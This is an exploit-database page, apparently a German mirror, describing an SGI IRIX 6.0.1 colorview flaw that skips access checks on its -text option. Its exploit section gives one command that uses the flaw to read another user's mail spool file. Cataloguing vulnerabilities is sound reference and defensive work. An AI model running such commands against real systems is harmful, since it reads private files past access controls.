SGI IRIX 6.0.1 colorview Vulnerability / ProjektOsUp

Einloggen

Username oder E-Mail Adresse*

Passwort *

Login-Daten speichern

Passwort Vergessen?

Sie haben noch kein Konto? Regestrieren

Regestrieren

Passwort vergessen

Bitte geben Sie Ihre E-Mail-Adresse ein, die Sie bei der Registrierung verwendet haben.

´

SGI IRIX <= 6.0.1 colorview Vulnerability

Exploit Datenbank (exploit-db.com)

CVE Datenbank (cve.mitre.org)

OSVDB Datenbank (osvdb.org)


	IRIX

Exploit Code

source: http://www.securityfocus.com/bid/336/info

Colorview fails to validate that the user has access to the file supplied to the -text option. As a result, users can view arbitrary files. 

/usr/sbin/colorview -text /var/spool/mail/admin